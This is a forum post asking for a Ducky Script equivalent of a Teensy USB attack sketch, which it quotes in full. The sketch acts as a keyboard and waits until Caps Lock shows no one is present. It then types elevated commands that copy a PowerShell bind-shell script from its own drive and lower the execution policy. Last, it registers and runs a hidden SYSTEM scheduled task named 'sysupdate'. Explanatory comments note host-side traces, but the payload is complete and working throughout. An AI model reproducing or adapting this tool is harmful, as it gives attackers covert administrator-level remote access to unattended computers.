I found this Teensy code on leg3nd's website. It basically turns on Caps Lock and waits to see if anyone turns it off. Then, if no one turns it off within a given amount of time, it executes the payload. I was wondering if there is anything in Ducky Script that can do something similar?
/* leg3nd's Windows powershell bindshell w/ system
Based on PhukdLib by irongeek, powershell bindshell by Rel1k
Detects user to implement attack based on capslock state
-MUST BE SET TO KEYBOARD + DISK(INTERNAL) TO WORK
*/
#include "usb_private.h"
// Shorthand wrappers around send_keys(key, modifier), defined further down.
// Each expansion already ends in ';', so a call written as `send_enter();`
// expands to the call followed by an empty statement.
#define send_enter() send_keys(KEY_ENTER, 0);
#define send_caps() send_keys(KEY_CAPS_LOCK, 0);
// No key code, modifier byte 128 (0x80).
// NOTE(review): presumably the right-GUI ("Windows") modifier bit; confirm against the Teensy key layout header.
#define send_windows() send_keys(0, 128);
#define send_alt_y() send_keys(KEY_Y, MODIFIERKEY_ALT);
#define send_windows_r() send_keys(KEY_R, MODIFIERKEY_GUI);
// Not read or written anywhere else in the visible sketch.
int attacked = 0;
// Runs once at power-up: makes pin 11 an output, pauses, then blinks it
// through startDelay() as a visible "device is alive" signal.
void setup() {
    const int kLedPin = 11;      // same pin startDelay() toggles
    const int kSettleMs = 5000;  // presumably lets the host finish enumerating the device (TODO confirm)

    pinMode(kLedPin, OUTPUT);
    delay(kSettleMs);
    startDelay(30, 25);  // startup blink: 30 pulses, 25 ms on each
}
// Main cycle. Uses Caps Lock as a presence tripwire: the sketch switches
// Caps Lock on, polls the host-reported LED state ten times, and treats any
// poll that finds it off as a sign that someone is at the keyboard.
//  - user detected  -> sleep 5 minutes; loop() is then entered again.
//  - no user        -> type three elevated commands through AdminCmd().
// Host-side traces visible in the strings below, useful for detection and
// triage: a file %APPDATA%\bind.ps1, the PowerShell execution policy set to
// RemoteSigned, and a scheduled task named "sysupdate" registered to run as
// SYSTEM and started immediately.
void loop(){
delay(9000); // Time between attack checks
if (!IsCapsOn()){send_caps();} //Turn on caps lock for trap
int userState = 0; // number of polls that found Caps Lock off
for (int m=9; m>=0; m--) { //Number of caps lock checks before attack, default = 10 checks
delay(3000); //Delay between caps lock check iterations
if (IsCapsOn()){
delay(3000); //Delay after caps lock is found to be on
} else {
userState = userState + 1;
}
}
// With Caps Lock on for every poll the loop above takes 10 x (3 s + 3 s), about 60 s.
if (userState>0){
delay(300000); //Time to wait if user is detected, 300K = 5min
} else {
// Command 1: asks WMIC for removable volumes (DriveType=2), keeps the line
// containing "Windows", copies bind.ps1 from that drive to %APPDATA%, then
// sets the execution policy.
// NOTE(review): "Windows" is presumably the volume label of the device's
// own disk (see the KEYBOARD + DISK note in the file header); confirm.
AdminCmd("cmd /c for /F %i in ('WMIC logicaldisk where \"DriveType=2\" list brief ^| find \"Windows\"') do copy /Y %i\\bind.ps1 %APPDATA%\\bind.ps1 && powershell -Command Set-ExecutionPolicy RemoteSigned");
delay(200);
// Command 2: registers a one-shot task "sysupdate" under the SYSTEM account
// that runs the copied script.
AdminCmd("schtasks /create /tn sysupdate /i /tr \"powershell -File %APPDATA%\\bind.ps1 -WindowStyle Hidden\" /sc once /ru system /st 23:59:59");
delay(200);
// Command 3: starts that task right away instead of waiting for 23:59:59.
AdminCmd("schtasks /run /tn sysupdate");
delay(999999999); //Just chill, payload already executed (max 11.5 days)
}
}
// Execute a command as administrator by typing it blind.
// Sequence as written: GUI key -> wait 1.5 s -> type SomeCommand ->
// hold Ctrl+Shift -> Enter -> wait 1 s -> Alt+Y.
// Nothing here checks that the Start menu or the elevation prompt actually
// appeared; the keystrokes go to whatever has focus when each delay expires.
// NOTE(review): Alt+Y answers a yes/no consent prompt. Presumably a standard
// (non-administrator) account, which is asked for credentials instead, stops
// the sequence at this point; confirm on the Windows version in question.
void AdminCmd(char *SomeCommand) {
send_windows();
delay(1500); //Delay for start menu to come up
Keyboard.print(SomeCommand);
Keyboard.set_modifier(MODIFIERKEY_CTRL);
Keyboard.send_now();
Keyboard.set_modifier(MODIFIERKEY_CTRL | MODIFIERKEY_SHIFT);
Keyboard.send_now();
// send_enter() passes modifier 0, which send_keys() does not apply, so the
// Ctrl+Shift set above is still in the report that carries Enter.
send_enter();
delay(1000); //Delay for UAC prompt
send_alt_y();
}
// Returns the current value of keyboard_leds widened to int.
// NOTE(review): keyboard_leds is presumably the LED status byte the host
// last sent to the emulated keyboard, declared in usb_private.h; confirm.
int ledkeys(void) {
    return static_cast<int>(keyboard_leds);
}
// Reports whether Caps Lock is lit according to ledkeys().
// True only for the values 2, 3, 6 and 7, i.e. the value-2 bit set together
// with any mix of the value-1 and value-4 bits. Every other value, including
// anything above 7, reports false.
boolean IsCapsOn() {
    switch (ledkeys()) {
        case 2:
        case 3:
        case 6:
        case 7:
            return true;
        default:
            return false;
    }
}
//Key & Utility functions
// Debug/status blink on pin 11.
// count: number of pulses; zero or negative produces none.
// dlay:  milliseconds the pin stays HIGH in each pulse; the LOW phase is
//        always 100 ms.
void startDelay(int count, int dlay) {
    const int kLedPin = 11;
    const int kOffMs = 100;

    for (int pulsesLeft = count; pulsesLeft > 0; --pulsesLeft) {
        digitalWrite(kLedPin, HIGH);
        delay(dlay);
        digitalWrite(kLedPin, LOW);
        delay(kOffMs);
    }
}
// Sends an "all keys up" report: clears the modifier byte and key slot 1,
// transmits the report, then waits 100 ms.
void release_keys() {
    const int kNone = 0;

    Keyboard.set_modifier(kNone);
    Keyboard.set_key1(kNone);
    Keyboard.send_now();
    delay(100);
}
// Presses one key (optionally with modifiers), holds it for 100 ms, then
// releases everything through release_keys().
// key:      key code placed in key slot 1.
// modifier: modifier bits to apply. A value of 0 is not written, so whatever
//           modifier state a caller set beforehand stays in the report.
void send_keys(int key, int modifier) {
    const bool hasModifier = (modifier != 0);
    if (hasModifier) {
        Keyboard.set_modifier(modifier);
    }

    Keyboard.set_key1(key);
    Keyboard.send_now();
    delay(100);

    release_keys();
}